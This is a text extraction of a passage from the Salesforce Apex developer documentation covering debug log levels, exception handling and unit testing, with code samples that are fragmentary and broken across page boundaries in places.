above
WF_ESCALATION_ACTION
Workflow
INFO and
above
WF_ESCALATION_RULE
None
Workflow
INFO and
above
396
Debugging Apex
Event Name
Category
Logged
WF_EVAL_ENTRY_CRITERIA
INFO and
above
WF_FIELD_UPDATE
INFO and
above
or field name
Level
Logged
WF_FLOW_ACTION_BEGIN
ID of flow trigger
Workflow
INFO and
above
WF_FLOW_ACTION_DETAIL
FINE and
above
WF_FLOW_ACTION_END
ID of flow trigger
Workflow
INFO and
above
WF_FLOW_ACTION_ERROR
Workflow
ERROR and
above
WF_FLOW_ACTION_ERROR_DETAIL
Workflow
ERROR and
above
WF_FORMULA
Workflow
INFO and
above
WF_HARD_REJECT
None
Workflow
INFO and
above
WF_NEXT_APPROVER
Workflow
INFO and
above
WF_NO_PROCESS_FOUND
None
Workflow
INFO and
above
WF_OUTBOUND_MSG
INFO and
above
rule
WF_PROCESS_NODE
Process name
Workflow
INFO and
above
WF_REASSIGN_RECORD
Workflow
INFO and
above
WF_RESPONSE_NOTIFY
INFO and
above
WF_RULE_ENTRY_ORDER
Workflow
INFO and
above
WF_RULE_EVAL_BEGIN
Rule type
Workflow
INFO and
above
397
Debugging Apex
Event Name
Category
Logged
Level
Logged
WF_RULE_EVAL_END
None
Workflow
INFO and
above
WF_RULE_EVAL_VALUE
Value
Workflow
INFO and
above
WF_RULE_FILTER
Filter criteria
Workflow
INFO and
above
WF_RULE_INVOCATION
EntityName: NameField Id
Workflow
INFO and
above
WF_RULE_NOT_EVALUATED
None
Workflow
INFO and
above
WF_SOFT_REJECT
Process name
Workflow
INFO and
above
WF_SPOOL_ACTION_BEGIN
Node type
Workflow
INFO and
above
WF_TIME_TRIGGER
Workflow
INFO and
above
Workflow
INFO and
above
WF_TIME_TRIGGERS_BEGIN
Type
Description
LogCategory
string
Specify the type of information returned in the debug log. Valid values are:
Db
Workflow
Validation
Callout
Apex_code
Apex_profiling
All
398
Debugging Apex
Element Name
Type
LogCategoryLevel string
Description
Specifies the amount of information returned in the debug log. Only the Apex_code
LogCategory uses the log category levels.
Valid log levels are (listed from lowest to highest):
ERROR
WARN
INFO
DEBUG
FINE
FINER
FINEST
In addition, the following log levels are still supported as part of the DebuggingHeader for backwards compatibility.
Log Level
Description
NONE
DEBUGONLY
Includes lower level messages, as well as messages generated by calls to the System.debug
method.
DB
Includes log messages generated by calls to the System.debug method, as well as every
data manipulation language (DML) statement or inline SOQL or SOSL query.
PROFILE
Includes log messages generated by calls to the System.debug method, every DML
statement or inline SOQL or SOSL query, and the entrance and exit of every user-defined method.
In addition, the end of the debug log contains overall profiling information for the portions of
the request that used the most resources, in terms of SOQL and SOSL statements, DML
operations, and Apex method invocations. These three sections list the locations in the code
that consumed the most time, in descending order of total cumulative time, along with the
number of times they were executed.
CALLOUT
Includes the request-response XML that the server is sending and receiving from an external
Web service. This is useful when debugging issues related to using Force.com Web services
API calls.
DETAIL
Includes all messages generated by the PROFILE level as well as the following:
Variable declaration statements
Start of loop executions
All loop controls, such as break and continue
Thrown exceptions *
Static and class initialization code *
Any changes in the with sharing context
399
Debugging Apex
Exceptions in Apex
The corresponding output header, DebuggingInfo, contains the resulting debug log. For more information, see DebuggingHeader
on page 1897.
Exceptions in Apex
Exceptions note errors and other events that disrupt the normal flow of code execution. throw statements are used to generate
exceptions, while try, catch, and finally statements are used to gracefully recover from exceptions.
There are many ways to handle errors in your code, including using assertions like System.assert calls, or returning error codes
or Boolean values, so why use exceptions? The advantage of using exceptions is that they simplify error handling. Exceptions bubble up
from the called method to the caller, as many levels as necessary, until a catch statement is found that will handle the error. This
relieves you from writing error handling code in each of your methods. Also, by using finally statements, you have one place to
recover from exceptions, like resetting variables and deleting data.
400
Debugging Apex
Exception Statements
Exception Statements
Apex uses exceptions to note errors and other events that disrupt the normal flow of code execution. throw statements can be used
to generate exceptions, while try, catch, and finally can be used to gracefully recover from an exception.
Throw Statements
A throw statement allows you to signal that an error has occurred. To throw an exception, use the throw statement and provide it
with an exception object to provide information about the specific error. For example:
throw exceptionObject;
Try-Catch-Finally Statements
The try, catch, and finally statements can be used to gracefully recover from a thrown exception:
The try statement identifies a block of code in which an exception can occur.
The catch statement identifies a block of code that can handle a particular type of exception. A single try statement can have
multiple associated catch statements; however, each catch statement must have a unique exception type. Also, once a particular
exception type is caught in one catch block, the remaining catch blocks, if any, arent executed.
The finally statement optionally identifies a block of code that is guaranteed to execute and allows you to clean up after the
code enclosed in the try block. A single try statement can have only one associated finally statement. Code in the
finally block always executes regardless of the type of exception that was thrown and handled.
Syntax
The syntax of these statements is as follows:
try {
code_block
} catch (exceptionType) {
code_block
}
// Optional catch statements for other exception types.
401
Debugging Apex
code_block
}
// Optional finally statement
} finally {
code_block
}
The insert DML statement in the example causes a DmlException because were inserting a merchandise item without setting any
of its required fields. This is the exception error that you see in the debug log.
System.DmlException: Insert failed. First exception on row 0; first error:
REQUIRED_FIELD_MISSING, Required fields are missing: [Description, Price, Total
Inventory]: [Description, Price, Total Inventory]
Next, execute this snippet in the Developer Console. Its based on the previous example but includes a try-catch block.
try {
Merchandise__c m = new Merchandise__c();
insert m;
} catch(DmlException e) {
402
Debugging Apex
Notice that the request status in the Developer Console now reports success. This is because the code handles the exception.
Any statements in the try block occurring after the exception are skipped and arent executed. For example, if you add a statement after
insert m;, this statement wont be executed. Execute the following:
try {
Merchandise__c m = new Merchandise__c();
insert m;
// This doesn't execute since insert causes an exception
System.debug('Statement after insert.');
} catch(DmlException e) {
System.debug('The following exception has occurred: ' + e.getMessage());
}
In the new debug log entry, notice that you dont see a debug message of Statement after insert. This is because this debug
statement occurs after the exception caused by the insertion and never gets executed. To continue the execution of code statements
after an exception happens, place the statement after the try-catch block. Execute this modified code snippet and notice that the debug
log now has a debug message of Statement after insert.
try {
Merchandise__c m = new Merchandise__c();
insert m;
} catch(DmlException e) {
System.debug('The following exception has occurred: ' + e.getMessage());
}
// This will get executed
System.debug('Statement after insert.');
Alternatively, you can include additional try-catch blocks. This code snippet has the System.debug statement inside a second
try-catch block. Execute it to see that you get the same result as before.
try {
Merchandise__c m = new Merchandise__c();
insert m;
} catch(DmlException e) {
System.debug('The following exception has occurred: ' + e.getMessage());
}
try {
System.debug('Statement after insert.');
// Insert other records
}
catch (Exception e) {
// Handle this exception here
}
The finally block always executes regardless of what exception is thrown, and even if no exception is thrown. Lets see it used in action.
Execute the following:
// Declare the variable outside the try-catch block
// so that it will be in scope for all blocks.
XmlStreamWriter w = null;
try {
403
Debugging Apex
w = new XmlStreamWriter();
w.writeStartDocument(null, '1.0');
w.writeStartElement(null, 'book', null);
w.writeCharacters('This is my book');
w.writeEndElement();
w.writeEndDocument();
// Perform some other operations
String s;
// This causes an exception because
// the string hasn't been assigned a value.
Integer i = s.length();
} catch(Exception e) {
System.debug('An exception occurred: ' + e.getMessage());
} finally {
// This gets executed after the exception is handled
System.debug('Closing the stream writer in the finally block.');
// Close the stream writer
w.close();
}
The previous code snippet creates an XML stream writer and adds some XML elements. Next, an exception occurs due to accessing the
null String variable s. The catch block handles this exception. Then the finally block executes. It writes a debug message and closes the
stream writer, which frees any associated resources. Check the debug output in the debug log. Youll see the debug message Closing
the stream writer in the finally block. after the exception error. This tells you that the finally block executed
after the exception was caught.
ListException
Any problem with a list, such as attempting to access an index that is out of bounds.
This example creates a list and adds one element to it. Then, an attempt is made to access two elements, one at index 0, which
exists, and one at index 1, which causes a ListException to be thrown because no element exists at this index. This exception is
404
Debugging Apex
caught in the catch block. The System.debug statement in the catch block writes the following to the debug log: The
following exception has occurred: List index out of bounds: 1.
try {
List<Integer> li = new List<Integer>();
li.add(15);
// This list contains only one element,
// but we're attempting to access the second element
// from this zero-based list.
Integer i1 = li[0];
Integer i2 = li[1]; // Causes a ListException
} catch(ListException le) {
System.debug('The following exception has occurred: ' + le.getMessage());
}
NullPointerException
Any problem with dereferencing a null variable.
This example creates a String variable named s but we dont initialize it to a value, hence, it is null. Calling the contains method
on our null variable causes a NullPointerException. The exception is caught in our catch block and this is what is written to the debug
log: The following exception has occurred: Attempt to de-reference a null object.
try {
String s;
Boolean b = s.contains('abc'); // Causes a NullPointerException
} catch(NullPointerException npe) {
System.debug('The following exception has occurred: ' + npe.getMessage());
}
QueryException
Any problem with SOQL queries, such as assigning a query that returns no records or more than one record to a singleton sObject
variable.
The second SOQL query in this example causes a QueryException. The example assigns a Merchandise object to what is returned
from the query. Note the use of LIMIT 1 in the query. This ensures that at most one object is returned from the database so we
can assign it to a single object and not a list. However, in this case, we dont have a Merchandise named XYZ, so nothing is returned,
and the attempt to assign the return value to a single object results in a QueryException. The exception is caught in our catch block
and this is what youll see in the debug log: The following exception has occurred: List has no rows
for assignment to SObject.
try {
// This statement doesn't cause an exception, even though
// we don't have a merchandise with name='XYZ'.
// The list will just be empty.
List<Merchandise__c> lm = [SELECT Name FROM Merchandise__c WHERE Name='XYZ'];
// lm.size() is 0
System.debug(lm.size());
// However, this statement causes a QueryException because
// we're assiging the return value to a Merchandise__c object
// but no Merchandise is returned.
Merchandise__c m = [SELECT Name FROM Merchandise__c WHERE Name='XYZ' LIMIT 1];
} catch(QueryException qe) {
System.debug('The following exception has occurred: ' + qe.getMessage());
}
405
Debugging Apex
SObjectException
Any problem with sObject records, such as attempting to change a field in an update statement that can only be changed during
insert.
This example results in an SObjectException in the try block, which is caught in the catch block. The example queries an invoice
statement and selects only its Name field. It then attempts to get the Description__c field on the queried sObject, which isnt available
because it isnt in the list of fields queried in the SELECT statement. This results in an SObjectException. This exception is caught in
our catch block and this is what youll see in the debug log: The following exception has occurred: SObject
row was retrieved via SOQL without querying the requested field:
Invoice_Statement__c.Description__c.
try {
Invoice_Statement__c inv = new Invoice_Statement__c(
Description__c='New Invoice');
insert inv;
// Query the invoice we just inserted
Invoice_Statement__c v = [SELECT Name FROM Merchandise__c WHERE Id=:inv:Id];
// Causes an SObjectException because we didn't retrieve
// the Description__c field.
String s = v.Description__c;
} catch(SObjectException se) {
System.debug('The following exception has occurred: ' + se.getMessage());
}
406
Debugging Apex
The catch statement argument type is the generic Exception type. It caught the more specific SObjectException. You can verify that this
is so by inspecting the return value of e.getTypeName() in the debug output. The output also contains other properties of the
SObjectException, like the error message, the line number where the exception occurred, and the stack trace. You might be wondering
why getCause returned null. This is because in our sample there was no previous exception (inner exception) that caused this
exception. In Creating Custom Exceptions, youll get to see an example where the return value of getCause is an actual exception.
407
Debugging Apex
System.debug('getNumDml=' + numErrors);
for(Integer i=0;i<numErrors;i++) {
System.debug('getDmlFieldNames=' + de.getDmlFieldNames(i));
System.debug('getDmlMessage=' + de.getDmlMessage(i));
}
}
Note how the sample above didnt include all the initial code in the try block. Only the portion of the code that could generate an
exception is wrapped inside a try block, in this case the insert statement could return a DML exception in case the input data is
not valid. The exception resulting from the insert operation is caught by the catch block that follows it. After executing this
sample, youll see an output of System.debug statements similar to the following:
14:01:24:939 USER_DEBUG [20]|DEBUG|getNumDml=2
14:01:24:941 USER_DEBUG [23]|DEBUG|getDmlFieldNames=(Price, Total Inventory)
14:01:24:941 USER_DEBUG [24]|DEBUG|getDmlMessage=Required fields are missing: [Price,
Total Inventory]
14:01:24:942 USER_DEBUG [23]|DEBUG|getDmlFieldNames=(Description, Price, Total Inventory)
14:01:24:942 USER_DEBUG [24]|DEBUG|getDmlMessage=Required fields are missing:
[Description, Price, Total Inventory]
The number of DML failures is correctly reported as two since two items in our list fail insertion. Also, the field names that caused the
failure, and the error message for each failed record is written to the output.
Alternatively, you can have several catch blocksa catch block for each exception type, and a final catch block that catches the generic
Exception type. Look at this example. Notice that it has three catch blocks.
try {
Merchandise__c m = [SELECT Name FROM Merchandise__c LIMIT 1];
// Causes an SObjectException because we didn't retrieve
// the Total_Inventory__c field.
Double inventory = m.Total_Inventory__c;
} catch(DmlException e) {
System.debug('DmlException caught: ' + e.getMessage());
} catch(SObjectException e) {
System.debug('SObjectException caught: ' + e.getMessage());
} catch(Exception e) {
408
Debugging Apex
Remember that only one catch block gets executed and the remaining ones are bypassed. This example is similar to the previous one,
except that it has a few more catch blocks. When you run this snippet, an SObjectException is thrown on this line: Double inventory
= m.Total_Inventory__c;. Every catch block is examined in the order specified to find a match between the thrown exception
and the exception type specified in the catch block argument:
1. The first catch block argument is of type DmlException, which doesnt match the thrown exception (SObjectException.)
2. The second catch block argument is of type SObjectException, which matches our exception, so this block gets executed and the
following message is written to the debug log: SObjectException caught: SObject row was retrieved via
SOQL without querying the requested field: Merchandise__c.Total_Inventory__c.
3. The last catch block is ignored since one catch block has already executed.
The last catch block is handy because it catches any exception type, and so catches any exception that was not caught in the previous
catch blocks. Suppose we modified the code above to cause a NullPointerException to be thrown, this exception gets caught in the last
catch block. Execute this modified example. Youll see the following debug message: Exception caught: Attempt to
de-reference a null object.
try {
String s;
Boolean b = s.contains('abc'); // Causes a NullPointerException
} catch(DmlException e) {
System.debug('DmlException caught: ' + e.getMessage());
} catch(SObjectException e) {
System.debug('SObjectException caught: ' + e.getMessage());
} catch(Exception e) {
System.debug('Exception caught: ' + e.getMessage());
}
Like Java classes, user-defined exception types can form an inheritance tree, and catch blocks can catch any object in this inheritance
tree. For example:
public class BaseException extends Exception {}
public class OtherException extends BaseException {}
try {
Integer i;
409
Debugging Apex
Here are some ways you can create your exceptions objects, which you can then throw.
You can construct exceptions:
With no arguments:
new MyException();
With a single Exception argument that specifies the cause and that displays in any stack trace:
new MyException(e);
With both a String error message and a chained exception cause that displays in any stack trace:
new MyException('This is bad', e);
This is how the stack trace looks like resulting from running the code above:
15:52:21:073 EXCEPTION_THROWN [7]|My1Exception: First exception
15:52:21:077 EXCEPTION_THROWN [11]|My2Exception: Throw with inner exception
15:52:21:000 FATAL_ERROR AnonymousBlock: line 11, column 1
15:52:21:000 FATAL_ERROR Caused by
410
Debugging Apex
The example in the next section shows how to handle an exception with an inner exception by calling the getCause method.
Youll use this exception class in the second class that youll create. Note that the curly braces at the end enclose the body of your
exception class, which we left empty because we get some free codeour class inherits all the constructors and common exception
methods, such as getMessage, from the built-in Exception class.
2. Next, create a second class named MerchandiseUtility.
public class MerchandiseUtility {
public static void mainProcessing() {
try {
insertMerchandise();
} catch(MerchandiseException me) {
System.debug('Message: ' + me.getMessage());
System.debug('Cause: ' + me.getCause());
System.debug('Line number: ' + me.getLineNumber());
System.debug('Stack trace: ' + me.getStackTraceString());
}
}
public static void insertMerchandise() {
try {
// Insert merchandise without required fields
Merchandise__c m = new Merchandise__c();
insert m;
} catch(DmlException e) {
// Something happened that prevents the insertion
// of Employee custom objects, so throw a more
// specific exception.
throw new MerchandiseException(
'Merchandise item could not be inserted.', e);
}
}
}
This class contains the mainProcessing method, which calls insertMerchandise. The latter causes an exception by
inserting a Merchandise without required fields. The catch block catches this exception and throws a new exception, the custom
MerchandiseException you created earlier. Notice that we called a constructor for the exception that takes two arguments: the error
message, and the original exception object. You might wonder why we are passing the original exception? Because it is useful
informationwhen the MerchandiseException gets caught in the first method, mainProcessing, the original exception
(referred to as an inner exception) is really the cause of this exception because it occurred before the MerchandiseException.
3. Now lets see all this in action to understand better. Execute the following:
MerchandiseUtility.mainProcessing();
411
Debugging Apex
4. Check the debug log output. You should see something similar to the following:
18:12:34:928 USER_DEBUG [6]|DEBUG|Message: Merchandise item could not be inserted.
18:12:34:929 USER_DEBUG [7]|DEBUG|Cause: System.DmlException: Insert failed. First
exception on row 0; first error: REQUIRED_FIELD_MISSING, Required fields are missing:
[Description, Price, Total Inventory]: [Description, Price, Total Inventory]
18:12:34:929 USER_DEBUG [8]|DEBUG|Line number: 22
18:12:34:930 USER_DEBUG [9]|DEBUG|Stack trace:
Class.EmployeeUtilityClass.insertMerchandise: line 22, column 1
412
Understanding
Testing in Apex
Understanding Test
Data
Testing Example
Apex provides a testing framework that allows you to write unit tests, run your tests, check test results,
and have code coverage results.
This chapter provides covers unit tests, data visibility for tests, as well as the tools that are available on
the Force.com platform for testing Apex. Testing best practices and a testing example are also provided.
413
Testing Apex
414
Testing Apex
Negative behavior
There are likely limits to your applications, such as not being able to add a future date, not being able to specify a negative amount,
and so on. You must test for the negative case and verify that the error messages are correctly produced as well as for the positive,
within the limits cases.
Restricted user
Test whether a user with restricted access to the sObjects used in your code sees the expected behavior. That is, whether they can
run the code or receive error messages.
Note: Conditional and ternary operators are not considered executed unless both the positive and negative branches are executed.
For examples of these types of tests, see Testing Example on page 432.
This is the same test class as in the previous example but it defines the test method with the isTest annotation instead.
@isTest
private class myClass {
@isTest static void myTest() {
// code_block
}
}
Use the isTest annotation to define classes and methods that only contain code used for testing your application. The isTest
annotation on methods is equivalent to the testMethod keyword.
Note: Classes defined with the isTest annotation don't count against your organization limit of 3 MB for all Apex code.
This is an example of a test class that contains two test methods.
@isTest
private class MyTestClass {
// Methods for testing
@isTest static void test1() {
// Implement test code
}
@isTest static void test2() {
// Implement test code
415
Testing Apex
}
}
Classes and methods defined as isTest can be either private or public. The access level of test classes methods doesnt
matter. This means you dont need to add an access modifier when defining a test class or test methods. The default access level in Apex
is private. The testing framework can always find the test methods and execute them, regardless of their access level.
Classes defined as isTest must be top-level classes and can't be interfaces or enums.
Methods of a test class can only be called from a running test, that is, a test method or code invoked by a test method, and can't be
called by a non-test request.
This example shows a class and its corresponding test class. This is the class to be tested. It contains two methods and a constructor.
public class TVRemoteControl {
// Volume to be modified
Integer volume;
// Constant for maximum volume value
static final Integer MAX_VOLUME = 50;
// Constructor
public TVRemoteControl(Integer v) {
// Set initial value for volume
volume = v;
}
public Integer increaseVolume(Integer amount) {
volume += amount;
if (volume > MAX_VOLUME) {
volume = MAX_VOLUME;
}
return volume;
}
public Integer decreaseVolume(Integer amount) {
volume -= amount;
if (volume < 0) {
volume = 0;
}
return volume;
}
public static String getMenuOptions() {
return 'AUDIO SETTINGS - VIDEO SETTINGS';
}
}
This is the corresponding test class. It contains four test methods. Each method in the previous class is called. Although this would have
been enough for test coverage, the test methods in the test class perform additional testing to verify boundary conditions.
@isTest
class TVRemoteControlTest {
@isTest static void testVolumeIncrease() {
TVRemoteControl rc = new TVRemoteControl(10);
416
Testing Apex
417
Testing Apex
Similarly, field history tracking records (such as AccountHistory) can't be created in test methods because they require other sObject
records to be committed first (for example, Account).
SEE ALSO:
IsTest Annotation
418
Testing Apex
The TestVisible annotation can be handy when you upgrade the Salesforce API version of existing classes containing mixed test
and non-test code. Because test methods arent allowed in non-test classes starting in API version 28.0, you must move the test methods
from the old class into a new test class (a class annotated with isTest) when you upgrade the API version of your class. You might
419
Testing Apex
run into visibility issues when accessing private methods or member variables of the original class. In this case, just annotate these private
members with TestVisible.
420
Testing Apex
However, if the Visualforce request performs a callback, such as a JavaScript remoting call, any data inserted by the callback
won't be visible to the test.
For Apex saved using Salesforce API version 27.0 and earlier, the VLOOKUP validation rule function always looks up data in the
organization, in addition to test data, when fired by a running Apex test. Starting with version 28.0, the VLOOKUP validation rule
function no longer accesses organization data from a running Apex test and looks up only data created by the test, unless the
test class or method is annotated with IsTest(SeeAllData=true).
There might be some cases where you cant create certain types of data from your test method because of specific limitations.
Here are some examples of such limitations.
Some standard objects arent createable. For more information on these objects, see the Object Reference for Salesforce and
Force.com.
For some sObjects that have fields with unique constraints, inserting duplicate sObject records results in an error. For example,
inserting CollaborationGroup sObjects with the same names results in an error because CollaborationGroup records must
have unique names. This happens whether or not your test is annotated with IsTest(SeeAllData=true).
Records that are created only after related records are committed to the database, like tracked changes in Chatter. Tracked
changes for a record (FeedTrackedChange records) in Chatter feeds aren't available when test methods modify the associated
record. FeedTrackedChange records require the change to the parent record they're associated with to be committed to
the database before they're created. Since test methods don't commit data, they don't result in the creation of
FeedTrackedChange records. Similarly, field history tracking records (such as AccountHistory) can't be created in test methods
because they require other sObject records to be committed first (for example, Account).
// Like the previous method, this test method can also access all data
421
Testing Apex
This second example shows how to apply the isTest(SeeAllData=true) annotation on a test method. Because the class that
the test method is contained in isnt defined with this annotation, you have to apply this annotation on the test method to enable access
to all data for that test method. The second test method doesnt have this annotation, so it can access only the data it creates in addition
to objects that are used to manage your organization, such as users.
// This class contains test methods with different data access levels.
@isTest
private class ClassWithDifferentDataAccess {
// Test method that has access to all data.
@isTest(SeeAllData=true)
static void testWithAllDataAccess() {
// Can query all data in the organization.
}
// Test method that has access to only the data it creates
// and organization setup and metadata objects.
@isTest static void testWithOwnDataAccess() {
// This method can still access the User object.
// This query returns the first user object.
User u = [SELECT UserName,Email FROM User LIMIT 1];
System.debug('UserName: ' + u.UserName);
System.debug('Email: ' + u.Email);
// Can access the test account that is created here.
Account a = new Account(Name='Test Account');
insert a;
// Access the account that was just created.
Account insertedAcct = [SELECT Id,Name FROM Account
WHERE Name='Test Account'];
System.assert(insertedAcct != null);
}
}
422
Testing Apex
Simply, add the data in a .csv file, create a static resource for this file, and then call Test.loadData within your test method by
passing it the sObject type token and the static resource name. For example, for Account records and a static resource name of
myResource, make the following call:
List<sObject> ls = Test.loadData(Account.sObjectType, 'myResource');
The Test.loadData method returns a list of sObjects that correspond to each record inserted.
You must create the static resource prior to calling this method. The static resource is a comma-delimited file ending with a .csv extension.
The file contains field names and values for the test records. The first line of the file must contain the field names and subsequent lines
are the field values. To learn more about static resources, see Defining Static Resources in the Salesforce online help.
Once you create a static resource for your .csv file, the static resource will be assigned a MIME type. Supported MIME types are:
text/csv
application/vnd.ms-excel
application/octet-stream
text/plain
Test.loadData Example
The following are steps for creating a sample .csv file and a static resource, and calling Test.loadData to insert the test records.
1. Create a .csv file that has the data for the test records. This is a sample .csv file with three account records. You can use this sample
content to create your .csv file.
Name,Website,Phone,BillingStreet,BillingCity,BillingState,BillingPostalCode,BillingCountry
sForceTest1,http://www.sforcetest1.com,(415) 901-7000,The Landmark @ One Market,San
Francisco,CA,94105,US
sForceTest2,http://www.sforcetest2.com,(415) 901-7000,The Landmark @ One Market Suite
300,San Francisco,CA,94105,US
sForceTest3,http://www.sforcetest3.com,(415) 901-7000,1 Market St,San
Francisco,CA,94105,US
423
Testing Apex
System.debug(acctName);
// Perform some testing using the test records
}
}
The test method in this class calls the test utility method, createTestRecords, to create five test accounts with three contacts
each.
@isTest
private class MyTestClass {
static testmethod void test1() {
424
Testing Apex
TestDataFactory.createTestRecords(5,3);
// Run some tests
}
}
425
Testing Apex
Note: If you have Apex classes that are installed from a managed package, you must compile these classes first by clicking
Compile all classes on the Apex Classes page so that they appear in the list. See Managing Apex Classes in the Salesforce
Help.
3. Select the tests to run. The list of tests includes only classes that contain test methods.
To select tests from an installed managed package, select its corresponding namespace from the drop-down list. Only the classes
of the managed package with the selected namespace appear in the list.
To select tests that exist locally in your organization, select [My Namespace] from the drop-down list. Only local classes that
aren't from managed packages appear in the list.
To select any test, select [All Namespaces] from the drop-down list. All the classes in the organization appear, whether or not
they are from a managed package.
Note: Classes with tests currently running don't appear in the list.
4. Click Run.
After you run tests using the Apex Test Execution page, you can view code coverage details in the Developer Console.
From Setup, click Develop > Apex Test Execution > View Test History to view all test results for your organization, not just tests that
you have run. Test results are retained for 30 days after they finish running, unless cleared.
This call allows you to run all tests in all classes, all tests in a specific namespace, or all tests in a subset of classes in a specific namespace,
as specified in the RunTestsRequest object. It returns the following:
Total number of tests that ran
Code coverage statistics (described below)
Error information for each failed test
Information for each test that succeeds
Time it took to run the test
426
Testing Apex
Though administrators in a Salesforce production organization cannot make changes to Apex code using the Salesforce user interface,
it is still important to use runTests() to verify that the existing unit tests run to completion after a change is made, such as adding
a unique constraint to an existing field. Salesforce production organizations must use the compileAndTest SOAP API call to make
changes to Apex code. For more information, see Deploying Apex on page 438.
For more information on runTests(), see SOAP API and SOAP Headers for Apex on page 1880.
427
Testing Apex
}
insert queueItems;
// Get the job ID of the first queue item returned.
ApexTestQueueItem item =
[SELECT ParentJobId FROM ApexTestQueueItem
WHERE Id=:queueItems[0].Id LIMIT 1];
return item.parentjobid;
}
return null;
}
// Get the status and pass rate for each class
// whose tests were run by the job.
// that correspond to the specified job ID.
public static void checkClassStatus(ID jobId) {
ApexTestQueueItem[] items =
[SELECT ApexClass.Name, Status, ExtendedStatus
FROM ApexTestQueueItem
WHERE ParentJobId=:jobId];
for (ApexTestQueueItem item : items) {
String extStatus = item.extendedstatus == null ? '' : item.extendedStatus;
System.debug(item.ApexClass.Name + ': ' + item.Status + extStatus);
}
}
// Get the result for each test method that was executed.
public static void checkMethodStatus(ID jobId) {
ApexTestResult[] results =
[SELECT Outcome, ApexClass.Name, MethodName, Message, StackTrace
FROM ApexTestResult
WHERE AsyncApexJobId=:jobId];
for (ApexTestResult atr : results) {
System.debug(atr.ApexClass.Name + '.' + atr.MethodName + ': ' + atr.Outcome);
if (atr.message != null) {
System.debug(atr.Message + '\n at ' + atr.StackTrace);
}
}
}
}
428
Testing Apex
Note: Every call to runAs counts against the total number of DML statements issued in the process.
In the following example, a new test user is created, then code is run as that user, with that user's record sharing access:
@isTest
private class TestRunAs {
public static testMethod void testRunAs() {
// Setup test data
// This code runs as the system user
Profile p = [SELECT Id FROM Profile WHERE Name='Standard User'];
User u = new User(Alias = 'standt', Email='[email protected]',
EmailEncodingKey='UTF-8', LastName='Testing', LanguageLocaleKey='en_US',
LocaleSidKey='en_US', ProfileId = p.Id,
TimeZoneSidKey='America/Los_Angeles', UserName='[email protected]');
System.runAs(u) {
// The following code runs as user 'u'
System.debug('Current User: ' + UserInfo.getUserName());
System.debug('Current Profile: ' + UserInfo.getProfileId());
}
}
}
You can nest more than one runAs method. For example:
@isTest
private class TestRunAs2 {
public static testMethod void test2() {
Profile p = [SELECT Id FROM Profile WHERE Name='Standard User'];
User u2 = new User(Alias = 'newUser', Email='[email protected]',
EmailEncodingKey='UTF-8', LastName='Testing', LanguageLocaleKey='en_US',
LocaleSidKey='en_US', ProfileId = p.Id,
TimeZoneSidKey='America/Los_Angeles', UserName='[email protected]');
System.runAs(u2) {
// The following code runs as user u2.
System.debug('Current User: ' + UserInfo.getUserName());
System.debug('Current Profile: ' + UserInfo.getProfileId());
// The following code runs as user u3.
User u3 = [SELECT Id FROM User WHERE UserName='[email protected]'];
System.runAs(u3) {
System.debug('Current User: ' + UserInfo.getUserName());
System.debug('Current Profile: ' + UserInfo.getProfileId());
}
// Any additional code here would run as user u2.
}
}
}
429
Testing Apex
430
Testing Apex
The list of record IDs specified by the Test.setFixedSearchResults method replaces the results that would normally be
returned by the SOSL query if it were not subject to any WHERE or LIMIT clauses. If these clauses exist in the SOSL query, they are
applied to the list of fixed search results. For example:
@isTest
private class SoslFixedResultsTest1 {
public static testMethod void testSoslFixedResults() {
Id [] fixedSearchResults= new Id[1];
fixedSearchResults[0] = '001x0000003G89h';
Test.setFixedSearchResults(fixedSearchResults);
List<List<SObject>> searchList = [FIND 'test'
IN ALL FIELDS RETURNING
Account(id, name WHERE name = 'test' LIMIT
1)];
}
}
Although the account record with an ID of 001x0000003G89h may not match the query string in the FIND clause ('test'), the
record is passed into the RETURNING clause of the SOSL statement. If the record with ID 001x0000003G89h matches the WHERE
clause filter, the record is returned. If it does not match the WHERE clause, no record is returned.
431
Testing Apex
Testing Example
Testing Example
The following example includes cases for the following types of tests:
Positive case with single and multiple records
Negative case with single and multiple records
432
Testing Apex
Testing Example
//Set up user
User u1 = [SELECT Id FROM User WHERE Alias='auser'];
//Run As U1
System.RunAs(u1){
System.debug('Inserting 300
//Bulk validation
totalMiles = 0;
System.debug('Inserting 200 mileage records... (bulk validation)');
List<Mileage__c> testMiles2 = new List<Mileage__c>();
for(integer i=0; i<200; i++) {
testMiles2.add( new Mileage__c(Miles__c = 1, Date__c = System.today()) );
}
insert testMiles2;
for(Mileage__c m:[SELECT miles__c FROM Mileage__c
WHERE CreatedDate = TODAY
and CreatedById = :u1.Id
and miles__c != null]) {
433
Testing Apex
Testing Example
totalMiles += m.miles__c;
}
System.assertEquals(maxtotalMiles, totalMiles);
}//end RunAs(u1)
} // runPositiveTestCases()
static testMethod void runNegativeTestCases() {
User u3 = [SELECT Id FROM User WHERE Alias='tuser'];
System.RunAs(u3){
System.debug('Inserting a record with 501 miles... (negative test case)');
Mileage__c testMiles3 = new Mileage__c( Miles__c = 501, Date__c = System.today()
);
try {
insert testMiles3;
} catch (DmlException e) {
//Assert Error Message
System.assert( e.getMessage().contains('Insert failed. First exception on ' +
'row 0; first error: FIELD_CUSTOM_VALIDATION_EXCEPTION, ' +
'Mileage request exceeds daily limit(500): [Miles__c]'),
e.getMessage() );
//Assert field
System.assertEquals(Mileage__c.Miles__c, e.getDmlFields(0)[0]);
434
Testing Apex
Testing Example
} // class MileageTrackerTestSuite
4. Use the system.assertEquals method to verify that the expected result is returned:
System.assertEquals(singletotalMiles, totalMiles);
5. Before moving to the next test, set the number of total miles back to 0:
totalMiles = 0;
435
Testing Apex
Testing Example
2. Add text to the debug log, indicating the next step of the code:
System.debug('Inserting 501 miles... negative test case');
4. Place the insert statement within a try/catch block. This allows you to catch the validation exception and assert the generated
error message.
try {
insert testMiles3;
} catch (DmlException e) {
5. Now use the System.assert and System.assertEquals to do the testing. Add the following code to the catch
block you previously created:
//Assert Error Message
System.assert(e.getMessage().contains('Insert failed. First exception '+
'on row 0; first error: FIELD_CUSTOM_VALIDATION_EXCEPTION, '+
'Mileage request exceeds daily limit(500): [Miles__c]'),
e.getMessage());
//Assert Field
System.assertEquals(Mileage__c.Miles__c, e.getDmlFields(0)[0]);
//Assert Status Code
System.assertEquals('FIELD_CUSTOM_VALIDATION_EXCEPTION'
e.getDmlStatusCode(0));
}
}
}
436
Testing Apex
Testing Example
3. Add text to the debug log, indicating the next step of the code:
System.debug('Setting up testing - deleting any mileage records for ' +
UserInfo.getUserName() +
' from today');
